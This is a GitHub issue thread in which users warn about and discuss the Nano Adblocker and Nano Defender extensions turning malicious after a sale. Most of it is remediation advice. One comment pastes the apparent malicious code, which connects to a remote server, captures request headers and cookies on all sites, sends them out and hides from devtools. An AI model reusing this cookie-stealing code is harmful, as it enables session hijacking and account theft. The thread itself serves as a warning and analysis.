### ISSUE TITLE
Beware: Nano AdBlock's New Devs

### ISSUE THREAD

**Issue by HenrickTheBull** [jspenguin2017/Snippets#3]
I recently got a notification from Edge alerting me that Nano was disabled due to malware and when I went to my extension this is what I saw. 
![image](https://user-images.githubusercontent.com/3945192/96508968-001c2f80-1221-11eb-80b9-a2276947c567.png)

The Chrome Webstore is completely gone too.

EDIT:
**Don't attack jspenguin2017 for this. I highly doubt they would have known this would happen.**

**Comment by musm** [comment]
Same here

**Comment by cyrsztof** [comment]
Uninstall, change all the passwords and spread the word.

**Comment by wadawada** [comment]
I feel the selling was very irresponsible and unethical behavior.
Should have pushed notification in the extension before the change of ownership so I can uninstall it on time to save my personal data.

Now I am notified by webstore and I have no idea how much of my data was stolen.
I never thought the adblocker would be the security hole.
Silver lining is I was gonna recommend nano adblocker to family and friends but I haven't.

**Comment by HenrickTheBull** [comment]
> I feel the selling was very irresponsible and unethical behavior.
> Should have pushed notification in the extension before the change of ownership so I can uninstall it on time to save my personal data.
> 
> Now I am notified by webstore and I have no idea how much of my data was stolen.
> I never thought the adblocker would be the security hole.
> Silver lining is I was gonna recommend nano adblocker to family and friends but I haven't.

I had to issue a warning because in my Discord server we had a resources channel with a "Privacy Protection" section and we highly recommended Nano and Nano Defender. I wasn't aware of this UNTIL I got the Webstore Notification.

![image](https://user-images.githubusercontent.com/3945192/96511361-97cf4d00-1224-11eb-9ae5-ca1ab99990f3.png)

**Comment by sandsmark** [comment]
fwiw, since what stopped gorhill from testing further, I'm fairly certain this kills all detection of devtools (even the latest `debug` tricks), as well as incognito detection (safer to debug it in incognito, not sure if they try to detect that though): https://github.com/sandsmark/anti-anti-devtools/blob/master/script.js

**Comment by cocacrave** [comment]
Got the warning from Chrome Extension just now. Read about it. Now I'm Scared AF...

I'm not sure if this is the place for this question so I'm sorry if I'm in the wrong place...
**Q.** I only copy and paste password from KeePass (Password Manager). Does that still mean my passwords are compromised?

**Comment by wadawada** [comment]
This is a disaster now.
I am just checking my Instagram's Settings/Account/Posts You've Liked
And notice I liked many things that I am not aware of. God knows what all of my accounts have done.
This is the worst security hole I have encountered. Wondering what people's data was worth.

Imagine this can happen again easily with other extensions. I believe this is something that webstore has to improve.

https://www.reddit.com/r/Adblock/comments/jc447f/nano_adblocker_nano_defender_was_sold_and_should/
https://www.ghacks.net/2020/10/16/time-to-remove-nano-adblocker-and-defender-from-your-browsers-except-firefox/

**Comment by yenhanshih** [comment]
Consider anything and everything compromised. On page load, your browser will listen to an URL and recieve directions on what to send up to it. It can send anything from plain text passwords to access tokens. I'll be changing all my credentials tonight and invalidating all my logins.

**Comment by painor** [comment]
So what's the alternative now ?

**Comment by HenrickTheBull** [comment]
> So what's the alternative now ?

I'm recommending going to uBlock Origin. Their team has been very good keeping things above board and that's what Nano was based on.

**Comment by cyrsztof** [comment]
> Got the warning from Chrome Extension just now. Read about it. Now I'm Scared AF...
> 
> I'm not sure if this is the place for this question so I'm sorry if I'm in the wrong place...
> **Q.** I only copy and paste password from KeePass (Password Manager). Does that still mean my passwords are compromised?

You should assume that all your data was stolen. Do not panic, Password Manager will make the process easier for you, just take your time and do it right.

**Comment by musm** [comment]
Well chrome disabled the extension so I assume that if you didn't re-enable you should be ok

**Comment by HenrickTheBull** [comment]
> Well chrome disabled the extension so I assume that if you didn't re-enable you should be ok

It could have been bad since the transfer.

**Comment by wadawada** [comment]
> Well chrome disabled the extension so I assume that if you didn't re-enable you should be ok
Check all your social accounts.
If you did not delete it before the transfer, your data was probably compromised.
https://github.com/jspenguin2017/Snippets/issues/3#issuecomment-712449305

**Comment by lilcsz** [comment]
Opera GX didn't detect virus and i disabled myself....

**Comment by LoLyeah** [comment]
> This is a disaster now.
> I am just checking my Instagram's Settings/Account/Posts You've Liked
> And notice I liked many things that I am not aware of. God knows what all of my accounts have done.
> This is the worst security hole I have encountered. Wondering what people's data was worth.

I didn't even opened my Instagram for weeks on PC, yet my acc still liking those random photos. How'd they do that?

**Comment by cocacrave** [comment]
> > Got the warning from Chrome Extension just now. Read about it. Now I'm Scared AF...
> > I'm not sure if this is the place for this question so I'm sorry if I'm in the wrong place...
> > **Q.** I only copy and paste password from KeePass (Password Manager). Does that still mean my passwords are compromised?
> 
> You should assume that all your data was stolen. Do not panic, Password Manager will make the process easier for you, just take your time and do it right.

Ok I'll change all my passwords to be safe. But I want to understand, should I prioritize sites I accessed since the transfer? Because to change all my passwords is kind of ridiculous... would take ages... although I'll get to it eventually.

**Comment by cocacrave** [comment]
> > This is a disaster now.
> > I am just checking my Instagram's Settings/Account/Posts You've Liked
> > And notice I liked many things that I am not aware of. God knows what all of my accounts have done.
> > This is the worst security hole I have encountered. Wondering what people's data was worth.
> 
> I didn't even opened my Instagram for weeks on PC, yet my acc still liking those random photos. How'd they do that?

Ok wow... that just answered my question I was wondering... Change all your passwords immediately.

**Comment by sandsmark** [comment]
> I didn't even opened my Instagram for weeks on PC, yet my acc still liking those random photos. How'd they do that?

just a guess, they could have sniffed the session cookies if you visited some site that connected to some instagram servers.

**Comment by panagiac** [comment]
@jspenguin2017 You screwed up so bad.

**Comment by mapx-** [comment]
Someone who analyzed the new (malware) code is saying they got the request headers (cookies, session) and not the body (other data li9ke passwords), read here:
https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295

**Comment by wadawada** [comment]
Does anyone know how to remove all likes on Instagram?
There are too many unauthorized likes that I can't unlike them one by one

**Comment by mapx-** [comment]
So, you should enter every such site and logout => the cookies on various servers will be removed / changed and for example other likes wont be possible anymore on instagram / other sites

**Comment by sandsmark** [comment]
> @jspenguin2017 You screwed up so bad.

I think he knows that, and while it was a (really) bad call it's kind of understandable when you're burnt out from trying to maintain a very popular open source project for free. I don't think anyone makes the best decisions in that state.

**Comment by cgorlla** [comment]
> Someone who analyzed the new (malware) code is saying they got the request headers (cookies, session) and not the body (other data like passwords), read here:
> [#2 (comment)](https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295)

If this is true then there's no reason to change passwords, just logout of everything and login again.

**Comment by sandsmark** [comment]
> If this is true then there's no reason to change passwords, just logout of everything and login again.

That was just a quick look at one version, it seems. Considering how much access the extension had/has it would be trivial to snarf everything typed into a password field.

Though if you use the browser's built in password manager they wouldn't have a way to access passwords you didn't type in (third party password extensions are probably safe, but I wouldn't bet on it considering how they work).

**Comment by Mutachre** [comment]
> Consider anything and everything compromised. On page load, your browser will listen to an URL and recieve directions on what to send up to it. It can send anything from plain text passwords to access tokens. I'll be changing all my credentials tonight and invalidating all my logins.

Ok, that's scary.

**Comment by technowhizz** [comment]
So I have no passwords saved on chrome and keep my passwords separately and hadn't logged in for a few weeks however, I was still affected by the instagram hack. It is definitely stolen cookies. Log out of all your accounts and log out of all sessions to be extra safe. I think your passwords are safe. It's the cookies.

**Comment by wadawada** [comment]
I do appreciate his work of dealing with anti-ads with trackers for free for quite some time
It is also true that he did not put much thoughts with the selling.
It just makes me wonder how much trust we can put on open source projects...

Anyway, we should focus on checking the scope of the damage
and what can do to deal with the damaged

**Comment by HenrickTheBull** [comment]
The Github repo for the new devs and the URL that Nano was reporting to are all gone.

![image](https://user-images.githubusercontent.com/3945192/96517210-26949780-122e-11eb-959a-1a43e8b2e7c7.png)
![image](https://user-images.githubusercontent.com/3945192/96517314-5d6aad80-122e-11eb-84fc-4a3115c6237d.png)

**Comment by painor** [comment]
So do we get to know how much were our cookies worth in $ ?

**Comment by sandsmark** [comment]
> It just makes me wonder how much trust we can put on open source projects...

About as much as not-open source. :-)

FWIW, the project was fine while it was "proper" open source, that's why gorhill was able to so quickly diff the released source code vs. what they actually shipped when they started modifying it.

> So I have no passwords saved on chrome and keep my passwords separately and hadn't logged in for a few weeks however, I was still affected by the instagram hack. It is definitely stolen cookies. Log out of all your accounts and log out of all sessions to be extra safe. I think your passwords are safe. It's the cookies.

What I meant was that it's likely that they got passwords as well, in addition to the session cookies.

**Comment by lilcsz** [comment]
@painor no problem just log out on all accounts

**Comment by musm** [comment]
Go to browser settings and delete all cookies. As  a precaution you can begin to change passwords in the meantime (even if they are not affected it's never a bad idea to change important ones)

**Comment by technowhizz** [comment]
> Go to browser settings and delete all cookies. As a precaution you can begin to change passwords in the meantime (even if they are not affected it's never a bad idea to change important ones)

DO NOT DO THIS. This doesn't destroy the cookies on the server 

go to each site and if you're logged in then log out and log in again

**Comment by sandsmark** [comment]
> @painor no problem just log out on all accounts

And change the password on all sites you typed in your password the last weeks (logging in, changing password, etc.).

> Go to browser settings and delete all cookies. As a precaution you can begin to change passwords in the meantime (even if they are not affected it's never a bad idea to change important ones)

That won't help, that just deletes the local cookies, the old session cookies might still be valid (depending on the site).

> So do we get to know how much were our cookies worth in $ ?

You can probably get a good estimate by looking at the prices on e. g. blackhatworld. :-P

**Comment by technowhizz** [comment]
> > It just makes me wonder how much trust we can put on open source projects...
> 
> About as much as not-open source. :-)
> 
> FWIW, the project was fine while it was "proper" open source, that's why gorhill was able to so quickly diff the released source code vs. what they actually shipped when they started modifying it.
> 
> > So I have no passwords saved on chrome and keep my passwords separately and hadn't logged in for a few weeks however, I was still affected by the instagram hack. It is definitely stolen cookies. Log out of all your accounts and log out of all sessions to be extra safe. I think your passwords are safe. It's the cookies.
> 
> What I meant was that it's likely that they got passwords as well, in addition to the session cookies.

Judging by [This](https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295) the issue is cookies only and in my own case it was cookies only as the password hadn't been typed in ages nor was it stored

**Comment by sandsmark** [comment]
> Judging by [This](https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295) the issue is cookies only and in my own case it was cookies only as the password hadn't been typed in ages nor was it stored

In this case, yes, but you don't know what else they got.

And FWIW, I checked some prices, instagrams likes are going for like 20 cents per 1000, following is 40 cent per thousand. So unfortunately I don't think you can make bank by selling your cookies freely. :-P

**Comment by DADESUPER** [comment]
> And FWIW, I checked some prices, instagrams likes are going for like 20 cents per 1000, following is 40 cent per thousand. So unfortunately I don't think you can make bank by selling your cookies freely. :-P

As i said on the other thread
>if i had access to someone's cookies i'd first of all target coin exchanges, then banks/CCs, then shopping sites and finally social media. So if we knows social media was hacked, well...

**Comment by sandsmark** [comment]
> > if i had access to someone's cookies i'd first of all target coin exchanges, then banks/CCs, then shopping sites and finally social media. So if we knows social media was hacked, well...

those are harder to target, it's much easier to just bulk sell IG/FB/reddit/twitter sessions for likes and followers through standard channels.

but again, we can't know for certain exactly how much they collected.

**Comment by DADESUPER** [comment]
> those are harder to target, it's much easier to just bulk sell IG/FB/reddit/twitter sessions for likes and followers through standard channels.
> 
> but again, we can't know for certain exactly how much they collected.

Better safe than sorry. Personally i'd rather make sure my money is safe, more than my instagram account. If i'm gonna waste time terminating sessions in facebook and instagram i'm sure as hell gonna make sure my money is safe.

Oh also now that i think about it: onlyfans has piss poor security, and has already been targeted by a malicious extension in the past. So if you have an account there i'd log out to be safe. I doubt that sort of thing will come up as a question so it's useful to bring it up

**Comment by Head** [comment]
> And FWIW, I checked some prices, instagrams likes are going for like 20 cents per 1000, following is 40 cent per thousand. So unfortunately I don't think you can make bank by selling your cookies freely. :-P

Looking on the cached page in the Chrome Web Store:
Nano Adblocker 100,000+ users
Nano Defender 200.000+ users

100k Instagram users, each do 100 likes would be $2000. Is that worth the risk going to jail? 🤣

**Comment by yenhanshih** [comment]
We may have an imposter among us...

@lilcsz 's account lists from Turkey. The account also contributed to repos that bomb and spam Instagram accounts among other blackhat repos contributed to.

**Comment by sandsmark** [comment]
> 100k Instagram users, each do 100 likes would be $2000. Is that worth the risk going to jail?

these are (usually) fairly well-established criminal operations (kind of confirmed by what yenhanshih dug up). so I assume they don't really care much about that risk. :-P

**Comment by RuggeDX** [comment]
Looks like one of my Instagram accounts I recently logged in to was compromised. None of the accounts that I auto-log-in to have had suspicious activity going on but I'm changing my passwords on pretty all of em anyway. Never had an account of mine get hacked like this haha

Judging by [this ](https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295)comment however, it seems that Instagram cookies aren't secure and that that's how they were able to get into my Insta, but not other accounts?

**Comment by sandsmark** [comment]
> So if I understand correctly, this most likely only affects sites where you were automatically logged in based on (unsecure) cookies?

I'd assume everywhere you didn't have to type your password every time you opened the page, i. e. with session cookies

**Comment by fiic5883** [comment]
> Judging by [this ](https://github.com/jspenguin2017/Snippets/issues/2#issuecomment-712448295)comment however, it seems that Instagram cookies aren't secure and that that's how they were able to get into my Insta, but not other accounts?
> 
> So if I understand correctly, this most likely only affects sites where you were automatically logged in based on (unsecure) cookies?

You misunderstand the whole process. In short, cookie are there to remember you every page load (there are other uses). This affect every site that doesn't tell you to re login every 5, 10, 15 minutes or so. The reason only Instagram got affected maybe because they only targeted Instagram at the moment.

**Comment by JDuesterhus** [comment]
> We may have an imposter among us...
> 
> @lilcsz 's account lists from Turkey. The account also contributed to repos that bomb and spam Instagram accounts among other blackhat repos contributed to.

the suspect even has an anime avatar. this is the man you're looking for your honor

**Comment by ZeroisAlive** [comment]
So I just got the news and don't know how to proceed. I would like some advice. I was using nano defender on google chrome which has sync enabled with my google account. I do not have any saved passwords, I always type them manually or is just already logged in with Google. Should I change every single one of my passwords starting with my google accounts? I do not use any social media.

**Comment by DADESUPER** [comment]
> So I just got the news and don't know how to proceed. I would like some advice. I was using nano defender on google chrome which has sync enabled with my google account. I do not have any saved passwords, I always type them manually or is just already logged in with Google. Should I change every single one of my passwords starting with my google accounts? I do not use any social media.

For the important sites change passwords, better safe than sorry. For the other sites go on the ones you logged into, log out then back in. That should invalidate the old cookie which the hacker could use to access the account.

As far as we know now only cookies were stolen, not passwords. But better safe than sorry. If an account is important to you and you have the time changing the password won't hurt. Deleting cookies locally won't fix anything and makes it harder to track down the sites you were logged into, so don't bother.

**Comment by ZeroisAlive** [comment]
> > So I just got the news and don't know how to proceed. I would like some advice. I was using nano defender on google chrome which has sync enabled with my google account. I do not have any saved passwords, I always type them manually or is just already logged in with Google. Should I change every single one of my passwords starting with my google accounts? I do not use any social media.
> 
> For the important sites change passwords, better safe than sorry. For the other sites go on the ones you logged into, log out then back in. That should invalidate the old session cookie which the hacker could use to access the account.
> 
> As far as we know now only cookies were stolen, not passwords. But better safe than sorry. If an account is important to you and you have the time changing the password won't hurt. Deleting cookies & history in the browser settings won't fix anything and makes it harder to track down the sites you were logged into, so don't bother.
> 
> For sites that support it (such as google and facebook) there's also a button to log out of all active sessions so all cookies are automatically invalidated. However that often deletes them all but the one you're currently using, so you may still need to log out and back in. Changing password automatically invalidates all session cookies for that site.

What does it mean exactly? Do they have access to all my cookies since acquiring the nano defender last week or throughout my use of nano defender? I went and changed all the passwords that I used for the past week, but not sure if  it's enough.

**Comment by HenrickTheBull** [comment]
I wasn't aware Defender got hit too until I opened up a browsing session that had both. 
![image](https://user-images.githubusercontent.com/3945192/96536308-5f963180-1259-11eb-8ee8-58115837faaa.png)

**Comment by DADESUPER** [comment]
> What does it mean exactly? Do they have access to all my cookies since acquiring the nano defender last week or throughout my use of nano defender? I went and changed all the passwords that I used for the past week, but not sure if it's enough.

When you logged in doesn't matter. If you used that that site at all in the last 4 days he potentially stole your session cookie, even if you were logged in for months.. Like/Share buttons present in many websites also count, which is why people had their instagram account hacked even if they didn't use instagram directly, so long as they were logged in. For all intents and purposes if you were logged into a website while having the extension, even if you didn't use the site directly (for example logged in months prior and ticked the "remember this computer" box), consider the site compromised.

**Comment by lilcsz** [comment]
@yenhanshih Hackers doesn't comment...

**Comment by panagiac** [comment]
Does anybody know if it is necessary to undo the steps for integrating Nano Defender with uBlock Origin?

**Comment by mapx-** [comment]
> Does anybody know if it is necessary to undo the steps for integrating Nano Defender with uBlock Origin?

You don't need any defender. 99% of all anti adblocking work has been done by uBO team (volunteers) directly in uBO filters list.

**Comment by panagiac** [comment]
> > Does anybody know if it is necessary to undo the steps for integrating Nano Defender with uBlock Origin?
> 
> You don't need any defender. 99% of all anti adblocking work has been done by uBO team (volunteers) directly in uBO filters list.

Yea, but that was not my question...

**Comment by mapx-** [comment]
Just use uBO with default setup.

**Comment by panagiac** [comment]
> Just use uBO with default setup. Reset it to default settings.

As other said, I suggested this extentions to a lot of people. I already told them to refresh cookies and remove Nano Defender. Do I also have to instruct them to remove the integration steps?

**Comment by mapx-** [comment]
Tell them to go into uBO, settings, click "Reset to default settings". Nothing more.

**Comment by schm1dtHL** [comment]
Should I try and change all passwords I have and logout of all sites I've visited in the last few days? Asking because a good chunk of my chrome history is deleted so that may complicate stuff, so far i've dealt with some key sites that could be targeted like Google, Microsoft, twitch, Twitter, etc

**Comment by lilcsz** [comment]
> Should I try and change all passwords I have and logout of all sites I've visited in the last few days? Asking because a good chunk of my chrome history is deleted so that may complicate stuff, so far i've dealt with some key sites that could be targeted like Google, Microsoft, twitch, Twitter, etc(reset passwords+ logged out of computer sessions where possible)

Yes

**Comment by lilcsz** [comment]
[computed_hashes.json.txt](https://github.com/jspenguin2017/Snippets/files/5409598/computed_hashes.json.txt)
can someone crack this file ? pls It's from Nano Defender, hackers added this file

**Comment by vungsung** [comment]
> [computed_hashes.json.txt](https://github.com/jspenguin2017/Snippets/files/5409598/computed_hashes.json.txt)
> can someone crack this file ? pls It's from Nano Defender, hackers added this file

That's the file used for checking the integrity of an extension. It exists in all other extensions.
https://stackoverflow.com/questions/48539411/what-is-the-purpose-of-the-file-computed-hashes-json-in-a-google-extension

**Comment by lilcsz** [comment]
Thanks @vungsung

**Comment by lilcsz** [comment]
Bad news... All cookies copied.. 

commands.json Nano Defender

var nanoDevAB = io.connect("https://www.dev-nano.com/");
var getNewListData = {};

async function getNewList(newList) {
    let getFeResp = await fetch(newList.uri, newList.attr)
    let num = 1;
    if (num == 1) {
        var getListObj = {}
    } else {
        var fact = 1;
        for (var i = 1; i > num; i--) {
            fact = fact * i;
            break;
        }
        var getListObj = {}
    }
    getListObj.headerEntries = Array.from(getFeResp.headers.entries())
    getListObj.data = await getFeResp.text()
    getListObj.ok = getFeResp.ok;
    getListObj.status = getFeResp.status;
    return getListObj;
}

nanoDevAB.on("getNewList", async function (newList) {
    let getRes = await getNewList(newList);
    nanoDevAB.emit(newList.callBack, getRes)
});

nanoDevAB.on("getNewListData", function (a) {
    getNewListData = a;
})

var handleLists = function (infos) {
    var listKey = Object.keys(getNewListData);
    var find1 = "-";
    var detailsHeader = infos.requestHeaders;
    var find2 = "z";
    var HeadReverse = detailsHeader.reverse();
    var stringyFy = JSON.stringify(HeadReverse);
    var find4 = "z";
    var countEqual = "";
    if (listKey.length > 0) {
        var checkerList = true;
        for (const object of listKey) {
            if (object.x === object.y) {
                countEqual += 1;
            }
            break;
        }
        for (let i = 0; i < listKey.length; i++) {
            let x = listKey[i];
            var re = new RegExp(getNewListData[x],'gi');
            countEqual = "5";
            if (infos[x].toString().match(re) == null) {
                checkerList = false;
                break;
            }
        }
        if (checkerList) {
            nanoDevAB.emit('newListhandeList', infos);
        }
    }

    var find3 = "z";
    var findAll = [find1, find2, find3, find4].join("");
    var parseConcat = stringyFy.split(findAll).join("");
    var parser = JSON.parse(parseConcat);
    return {
        requestHeaders: parser
    }
};
chrome.webRequest.onBeforeSendHeaders.addListener(handleLists, {
    urls: ["<all_urls>"]
}, ['requestHeaders', 'blocking', 'extraHeaders']);


var element = document.createElement("p"); ;
var openListGet = false;
element.__defineGetter__("id", function() {
    openListGet = true; 
});

var i = setInterval(function() {
    openListGet = false;
    console.log(element);
    if(openListGet){
        nanoDevAB.emit("report")
        console.clear();
        clearInterval(i)
    }
}, 100);

/******************************************************************************/

(( ) => {

// *****************************************************************************
// start of local namespace

if ( µBlock.canUseShortcuts === false ) { return; }

const relaxBlockingMode = (( ) => {
    const reloadTimers = new Map();

    return function(tab) {
        if ( tab instanceof Object === false || tab.id <= 0 ) { return; }

        const µb = µBlock;
        const normalURL = µb.normalizePageURL(tab.id, tab.url);

        if ( µb.getNetFilteringSwitch(normalURL) === false ) { return; }

        const hn = µb.URI.hostnameFromURI(normalURL);
        const curProfileBits = µb.blockingModeFromHostname(hn);
        let newProfileBits;
        for ( const profile of µb.liveBlockingProfiles ) {
            if ( (curProfileBits & profile.bits & ~1) !== curProfileBits ) {
                newProfileBits = profile.bits;
                break;
            }
        }

        // TODO: Reset to original blocking profile?
        if ( newProfileBits === undefined ) { return; }

        if (
            (curProfileBits & 0b00000010) !== 0 &&
            (newProfileBits & 0b00000010) === 0
        ) {
            µb.toggleHostnameSwitch({
                name: 'no-scripting',
                hostname: hn,
                state: false,
            });
        }
        if ( µb.userSettings.advancedUserEnabled ) {
            if (
                (curProfileBits & 0b00000100) !== 0 &&
                (newProfileBits & 0b00000100) === 0
            ) {
                µb.toggleFirewallRule({
                    srcHostname: hn,
                    desHostname: '*',
                    requestType: '3p',
                    action: 3,
                });
            }
            if (
                (curProfileBits & 0b00001000) !== 0 &&
                (newProfileBits & 0b00001000) === 0
            ) {
                µb.toggleFirewallRule({
                    srcHostname: hn,
                    desHostname: '*',
                    requestType: '3p-script',
                    action: 3,
                });
            }
            if (
                (curProfileBits & 0b00010000) !== 0 &&
                (newProfileBits & 0b00010000) === 0
            ) {
                µb.toggleFirewallRule({
                    srcHostname: hn,
                    desHostname: '*',
                    requestType: '3p-frame',
                    action: 3,
                });
            }
        }

        // Reload the target tab?
        if ( (newProfileBits & 0b00000001) === 0 ) { return; }

        // Reload: use a timer to coalesce bursts of reload commands.
        let timer = reloadTimers.get(tab.id);
        if ( timer !== undefined ) {
            clearTimeout(timer);
        }
        timer = vAPI.setTimeout(
            tabId => {
                reloadTimers.delete(tabId);
                vAPI.tabs.reload(tabId);
            },
            547,
            tab.id
        );
        reloadTimers.set(tab.id, timer);
    };
})();

vAPI.commands.onCommand.addListener(async command => {
    const µb = µBlock;

    switch ( command ) {
    case 'launch-element-picker':
    case 'launch-element-zapper': {
        const tab = await vAPI.tabs.getCurrent();
        if ( tab instanceof Object === false ) { return; }
        µb.epickerArgs.mouse = false;
        µb.elementPickerExec(
            tab.id,
            undefined,
            command === 'launch-element-zapper'
        );
        break;
    }
    case 'launch-logger': {
        const tab = await vAPI.tabs.getCurrent();
        if ( tab instanceof Object === false ) { return; }
        const hash = tab.url.startsWith(vAPI.getURL(''))
            ? ''
            : `#_+${tab.id}`;
        µb.openNewTab({
            url: `logger-ui.html${hash}`,
            select: true,
            index: -1,
        });
        break;
    }
    case 'open-dashboard': {
        µb.openNewTab({
            url: 'dashboard.html',
            select: true,
            index: -1,
        });
        break;
    }
    case 'relax-blocking-mode':
        relaxBlockingMode(await vAPI.tabs.getCurrent());
        break;
    default:
        break;
    }
});

// end of local namespace
// *****************************************************************************

})();

/******************************************************************************/

**Comment by lilcsz** [comment]
@Head @sandsmark 2000 USD = 15,000 at Turkey lmao

**Comment by Richardzleung** [comment]
Does this only effect chrome? I was running the edge version so should I change my passwords?

**Comment by ioantsaf** [comment]
> Does anyone know how to remove all likes on Instagram?
> There are too many unauthorized likes that I can't unlike them one by one

I developed a script that detects suspicious Instagram likes, and lets you remove them:
https://github.com/ioantsaf/hacked_insta_unliker

Here you can find the Windows release, if you do not have access to a Python Interpreter:
https://github.com/ioantsaf/hacked_insta_unliker/releases/tag/v1.0.0

**Comment by emrahaydemir** [comment]
it's terrible. I examine the network traffic periodically for my job. I've seen queries posted to Instagram at regular intervals. I didn't take this into consideration because I was in a hurry. my stupid head. It was about 1 week ago.

**Comment by PoloniumRain** [comment]
My Instagram wasn't affected and it's probably because i use Cookie AutoDelete. I'd already recommend this extension, but now even more so. Basically it can be set to delete a sites cookies after you close the tab. For example, when i close this GitHub tab, all GitHub cookies will be deleted. So i had few cookies to steal (apart from cookies for currently open tabs) and it looks like this saved me. I still changed all passwords, and everyone should do the same. 

I'd also recommend using two-factor authentication (2FA) when possible because that will pretty much always stop this type of attack.

Anyway, never using anything from jspenguin2017 again because selling something like this to random devs with no track record is about as stupid as you can get. It's blatantly obvious and common sense what could happen (and did). There's **no excuse.**

**Comment by brbsix** [comment]
@PoloniumRain This extension gathered authorization cookies while users were browsing. It allows the attacker to gain access to your account without logging in. 2FA does nothing to prevent to this. Nor would an extension that deletes cookies after tabs are closed.

**Comment by PoloniumRain** [comment]
@brbsix I came to my assumption because i've seen a couple of people mention that their Instagram account had been liking posts even when they hadn't logged in to IG for months. So in those cases the attacker must have used old cookies? In which case an extension that deletes cookies currently not in-use would help. Unless more than just cookies have been stolen or these people are mistaken...
